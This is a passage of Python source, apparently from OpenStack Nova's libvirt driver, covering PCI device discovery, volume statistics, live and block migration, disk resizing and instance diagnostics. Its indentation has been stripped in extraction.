if len(fun_cap.device_addrs) != 0:
if fun_cap.type == 'virt_functions':
return {'dev_type': 'type-PF'}
if fun_cap.type == 'phys_function':
return {'dev_type': 'type-VF',
'phys_function': fun_cap.device_addrs}
return {'dev_type': 'type-PCI'}
virtdev = self._conn.nodeDeviceLookupByName(devname)
xmlstr = virtdev.XMLDesc(0)
cfgdev = vconfig.LibvirtConfigNodeDevice()
cfgdev.parse_str(xmlstr)
address = "%04x:%02x:%02x.%1x" % (
cfgdev.pci_capability.domain,
cfgdev.pci_capability.bus,
cfgdev.pci_capability.slot,
cfgdev.pci_capability.function)
device = {
"dev_id": cfgdev.name,
"address": address,
"product_id": cfgdev.pci_capability.product_id[2:6],
"vendor_id": cfgdev.pci_capability.vendor_id[2:6],
}
#requirement by DataBase Model
device['label'] = 'label_%(vendor_id)s_%(product_id)s' % device
device.update(_get_device_type(cfgdev))
return device
def _pci_device_assignable(self, device):
if device['dev_type'] == 'type-PF':
return False
return self.dev_filter.device_assignable(device)
def get_pci_passthrough_devices(self):
"""Get host pci devices information.
Obtains pci devices information from libvirt, and returns
as a json string.
Each device information is a dictionary, with mandatory keys
of 'address', 'vendor_id', 'product_id', 'dev_type', 'dev_id',
'label' and other optional device specific information.
Refer to the objects/pci_device.py for more idea of these keys.
:returns: a list of the assignable pci devices information
"""
pci_info = []
dev_names = self._conn.listDevices('pci', 0) or []
for name in dev_names:
pci_dev = self._get_pcidev_info(name)
if self._pci_device_assignable(pci_dev):
pci_info.append(pci_dev)
return jsonutils.dumps(pci_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug(_("Trying to get stats for the volume %s"),
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
_("Got volume usage stats for the volume=%(volume)s,"
" instance=%(instance)s, rd_req=%(rd_req)d,"
" rd_bytes=%(rd_bytes)d, wr_req=%(wr_req)d,"
" wr_bytes=%(wr_bytes)d")
% stats)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk):
"""
Note that this function takes an instance name.
"""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, interface):
"""
Note that this function takes an instance name.
"""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(interface)
def get_console_pool_info(self, console_type):
#TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource information.
This method is called when nova-compute launches, and
as part of a periodic task that records the results in the DB.
:param nodename: will be put in PCI device
:returns: dictionary containing resource info
"""
# Temporary: convert supported_instances into a string, while keeping
# the RPC version as JSON. Can be changed when RPC broadcast is removed
stats = self.host_state.get_host_stats(refresh=True)
stats['supported_instances'] = jsonutils.dumps(
stats['supported_instances'])
return stats
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.") % tmp_file)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * 1024) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
filename = dest_check_data["filename"]
block_migration = dest_check_data["block_migration"]
is_volume_backed = dest_check_data.get('is_volume_backed', False)
has_local_disks = bool(
jsonutils.loads(self.get_instance_disk_info(instance['name'])))
shared = self._check_shared_storage_test_file(filename)
if block_migration:
if shared:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not shared and (not is_volume_backed or has_local_disks):
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
dest_check_data.update({"is_shared_storage": shared})
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
# Libvirt supports qcow2 disk format,which is usually compressed
# on compute nodes.
# Real disk image (compressed) may enlarged to "virtual disk size",
# that is specified as the maximum disk size.
# (See qemu-img -f path-to-disk)
# Scheduler recognizes destination host still has enough disk space
# if real disk size < available disk size
# if disk_over_commit is True,
# otherwise virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * unit.Mi
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
'Disk of instance is too large(available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openAuth(...).getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string that shows cpu feature(see get_cpu_info())
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_('Instance launched has CPU info:\n%s') % cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# unknown character exists in xml, then libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = unicode(e)
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.") % tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
Cannot confirm tmpfile return False.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info,
time_module=None):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
if not time_module:
time_module = greenthread
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance["name"])
time_module.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params block_migration: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, do block migration.
:params migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.block_migration_flag.split(',')
else:
flaglist = CONF.live_migration_flag.split(',')
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
dom.migrateToURI(CONF.live_migration_uri % dest,
logical_sum,
None,
CONF.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.InstanceNotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_storage = True
is_volume_backed = False
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_storage = migrate_data.get('is_shared_storage', True)
is_volume_backed = migrate_data.get('is_volume_backed', False)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not is_shared_storage:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
# Ensure images and backing files are present.
self._create_images_and_backing(context, instance, instance_dir,
disk_info)
if is_volume_backed and not (is_block_migration or is_shared_storage):
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt_type, vol)
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
# Retry operation is necessary because continuously request comes,
# concurrent request occurs to iptables, then it complains.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
def _create_images_and_backing(self, context, instance, instance_dir,
disk_info_json):
"""
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params instance_dir:
instance path to use, calculated externally to handle block
migrating an instance with an old style instance path
:params disk_info_json:
json strings specified in get_instance_disk_info
"""
if not disk_info_json:
disk_info = []
else:
disk_info = jsonutils.loads(disk_info_json)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['disk_size'])
elif info['backing_file']:
# Creating backing file follows same way as spawning instances.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt_images_type)
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration(self, context, instance, block_device_info):
# Disconnect from volume server
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance)
self.to_xml(context, instance, network_info, disk_info,
block_device_info, write_to_disk=True)
# libvirt.xml should be made by to_xml(), but libvirt
# does not accept to_xml() result, since uuid is not
# included in to_xml() result.
dom = self._lookup_by_name(instance["name"])
self._conn.defineXML(dom.XMLDesc(0))
def get_instance_disk_info(self, instance_name, xml=None,
block_device_info=None):
"""Preparation block migration.
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:return:
json strings with below format::
"[{'path':'disk', 'type':'raw',
'virt_disk_size':'10737418240',
'backing_file':'backing_file',
'disk_size':'83886080'},...]"
"""
# NOTE (rmk): Passing the domain XML into this function is optional.
# When it is not passed, we attempt to extract it from
# the pre-existing definition.
if xml is None:
try:
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
# NOTE (rmk): When block_device_info is provided, we will use it to
# filter out devices which are actually volumes.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if not path:
LOG.debug(_('skipping disk for %s as it does not have a path'),
instance_name)
continue
if disk_type != 'file':
LOG.debug(_('skipping %s since it looks like volume'), path)
continue
if target in volume_devices:
LOG.debug(_('skipping disk %(path)s (%(target)s) as it is a '
'volume'), {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = 0
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
# Disk size that all instance uses : virtual_size - disk_size
instances_name = self.list_instances()
disk_over_committed_size = 0
for i_name in instances_name:
try:
disk_infos = jsonutils.loads(
self.get_instance_disk_info(i_name))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except OSError as e:
if e.errno == errno.ENOENT:
LOG.error(_('Getting disk size of %(i_name)s: %(e)s'),
{'i_name': i_name, 'e': e})
else:
raise
except exception.InstanceNotFound:
# Instance was deleted during the check so ignore it
pass
# NOTE(gtt116): give change to do other task.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
#NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.verify_base_images(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
shared_storage = (dest == self.get_host_ip_addr())
if not shared_storage:
tmp_file = uuid.uuid4().hex + '.tmp'
tmp_path = os.path.join(inst_base, tmp_file)
try:
utils.execute('ssh', dest, 'touch', tmp_path)
if os.path.exists(tmp_path):
shared_storage = True
os.unlink(tmp_path)
else:
utils.execute('ssh', dest, 'rm', tmp_path)
except Exception:
pass
return shared_storage
def migrate_disk_and_power_off(self, context, instance, dest,
instance_type, network_info,
block_device_info=None):
LOG.debug(_("Starting migrate_disk_and_power_off"),
instance=instance)
disk_info_text = self.get_instance_disk_info(instance['name'],
block_device_info=block_device_info)
disk_info = jsonutils.loads(disk_info_text)
# copy disks to destination
# rename instance dir to +_resize at first for using
# shared storage for instance dir (eg. NFS).
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
shared_storage = self._is_storage_shared_with(dest, inst_base)
# try to create the directory on the remote compute node
# if this fails we pass the exception up the stack so we can catch
# failures here earlier
if not shared_storage:
utils.execute('ssh', dest, 'mkdir', '-p', inst_base)
self.power_off(instance)
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
try:
utils.execute('mv', inst_base, inst_base_resize)
# if we are migrating the instance with shared storage then
# create the directory. If it is a remote node the directory
# has already been created
if shared_storage:
dest = None
utils.execute('mkdir', '-p', inst_base)
for info in disk_info:
# assume inst_base == dirname(info['path'])
img_path = info['path']
fname = os.path.basename(img_path)
from_path = os.path.join(inst_base_resize, fname)
if info['type'] == 'qcow2' and info['backing_file']:
tmp_path = from_path + "_rbase"
# merge backing file
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'qcow2', from_path, tmp_path)
if shared_storage:
utils.execute('mv', tmp_path, img_path)
else:
libvirt_utils.copy_image(tmp_path, img_path, host=dest)
utils.execute('rm', '-f', tmp_path)
else: # raw or qcow2 with no backing file
libvirt_utils.copy_image(from_path, img_path, host=dest)
except Exception:
with excutils.save_and_reraise_exception():
self._cleanup_remote_migration(dest, inst_base,
inst_base_resize,
shared_storage)
return disk_info_text
def _wait_for_running(self, instance):
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_("Instance running successfully."), instance=instance)
raise loopingcall.LoopingCallDone()
def finish_migration(self, context, migration, instance, disk_info,
network_info, image_meta, resize_instance,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_migration"), instance=instance)
# resize disks. only "disk" and "disk.local" are necessary.
disk_info = jsonutils.loads(disk_info)
for info in disk_info:
fname = os.path.basename(info['path'])
if fname == 'disk':
size = instance['root_gb']
elif fname == 'disk.local':
size = instance['ephemeral_gb']
else:
size = 0
size *= unit.Gi
# If we have a non partitioned image that we can extend
# then ensure we're in 'raw' format so we can extend file system.
fmt = info['type']
if (size and fmt == 'qcow2' and
disk.can_resize_image(info['path'], size) and
disk.is_image_partitionless(info['path'], use_cow=True)):
path_raw = info['path'] + '_raw'
utils.execute('qemu-img', 'convert', '-f', 'qcow2',
'-O', 'raw', info['path'], path_raw)
utils.execute('mv', path_raw, info['path'])
fmt = 'raw'
if size:
use_cow = fmt == 'qcow2'
disk.extend(info['path'], size, use_cow=use_cow)
if fmt == 'raw' and CONF.use_cow_images:
# back to qcow2 (no backing_file though) so that snapshot
# will be available
path_qcow = info['path'] + '_qcow'
utils.execute('qemu-img', 'convert', '-f', 'raw',
'-O', 'qcow2', info['path'], path_qcow)
utils.execute('mv', path_qcow, info['path'])
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info,
image_meta)
# assume _create_image do nothing if a target file exists.
self._create_image(context, instance,
disk_mapping=disk_info['mapping'],
network_info=network_info,
block_device_info=None, inject_files=False)
xml = self.to_xml(context, instance, network_info, disk_info,
block_device_info=block_device_info,
write_to_disk=True)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on,
context=context)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def _cleanup_failed_migration(self, inst_base):
"""Make sure that a failed migrate doesn't prevent us from rolling
back in a revert.
"""
try:
shutil.rmtree(inst_base)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def finish_revert_migration(self, instance, network_info,
block_device_info=None, power_on=True):
LOG.debug(_("Starting finish_revert_migration"),
instance=instance)
inst_base = libvirt_utils.get_instance_path(instance)
inst_base_resize = inst_base + "_resize"
# NOTE(danms): if we're recovering from a failed migration,
# make sure we don't have a left-over same-host base directory
# that would conflict. Also, don't fail on the rename if the
# failure happened early.
if os.path.exists(inst_base_resize):
self._cleanup_failed_migration(inst_base)
utils.execute('mv', inst_base_resize, inst_base)
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance,
block_device_info)
xml = self.to_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
self._create_domain_and_network(xml, instance, network_info,
block_device_info, power_on)
if power_on:
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running,
instance)
timer.start(interval=0.5).wait()
def confirm_migration(self, migration, instance, network_info):
"""Confirms a resize, destroying the source VM."""
self._cleanup_resize(instance, network_info)
def get_diagnostics(self, instance):
def get_io_devices(xml_doc):
"""get the list of io devices from the xml document."""
result = {"volumes": [], "ifaces": []}
try:
doc = etree.fromstring(xml_doc)
except Exception:
return result
blocks = [('./devices/disk', 'volumes'),
('./devices/interface', 'ifaces')]
for block, key in blocks:
section = doc.findall(block)
for node in section:
for child in node.getchildren():
if child.tag == 'target' and child.get('dev'):
result[key].append(child.get('dev'))
return result
domain = self._lookup_by_name(instance['name'])
output = {}
# get cpu time, might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
cputime = domain.vcpus()[0]
for i in range(len(cputime)):
output["cpu" + str(i) + "_time"] = cputime[i][2]
except libvirt.libvirtError:
pass
# get io status
xml = domain.XMLDesc(0)
dom_io = get_io_devices(xml)
for disk in dom_io["volumes"]:
try:
# blockStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.blockStats(disk)
output[disk + "_read_req"] = stats[0]
output[disk + "_read"] = stats[1]
output[disk + "_write_req"] = stats[2]
output[disk + "_write"] = stats[3]
output[disk + "_errors"] = stats[4]
except libvirt.libvirtError:
pass
for interface in dom_io["ifaces"]:
try:
# interfaceStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
stats = domain.interfaceStats(interface)
output[interface + "_rx"] = stats[0]
output[interface + "_rx_packets"] = stats[1]
output[interface + "_rx_errors"] = stats[2]
output[interface + "_rx_drop"] = stats[3]
output[interface + "_tx"] = stats[4]
output[interface + "_tx_packets"] = stats[5]
output[interface + "_tx_errors"] = stats[6]
output[interface + "_tx_drop"] = stats[7]
except libvirt.libvirtError:
pass
output["memory"] = domain.maxMemory()
# memoryStats might launch an exception if the method
# is not supported by the underlying hypervisor being
# used by libvirt
try:
mem = domain.memoryStats()
for key in mem.keys():
output["memory-" + key] = mem[key]
except (libvirt.libvirtError, AttributeError):
pass
return output
def instance_on_disk(self, instance):
# ensure directories exist and are writable
instance_path = libvirt_utils.get_instance_path(instance)
LOG.debug(_('Checking instance files accessibility %s'), instance_path)
return os.access(instance_path, os.W_OK)
def inject_network_info(self, instance, nw_info):
self.firewall_driver.setup_basic_filtering(instance, nw_info)
def _delete_instance_files(self, instance):
# NOTE(mikal): a shim to handle this file not using instance objects
# everywhere. Remove this when that conversion happens.
context = nova_context.get_admin_context()
inst_obj = instance_obj.Instance.get_by_uuid(context, instance['uuid'])
# NOTE(mikal): this code should be pushed up a layer when this shim is
# removed.
attempts = int(inst_obj.system_metadata.get('clean_attempts', '0'))
success = self.delete_instance_files(inst_obj)
inst_obj.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
inst_obj.cleaned = True
inst_obj.save(context)
def delete_instance_files(self, instance):
target = libvirt_utils.get_instance_path(instance)
if os.path.exists(target):
LOG.info(_('Deleting instance files %s'), target,
instance=instance)
try:
shutil.rmtree(target)
except OSError as e:
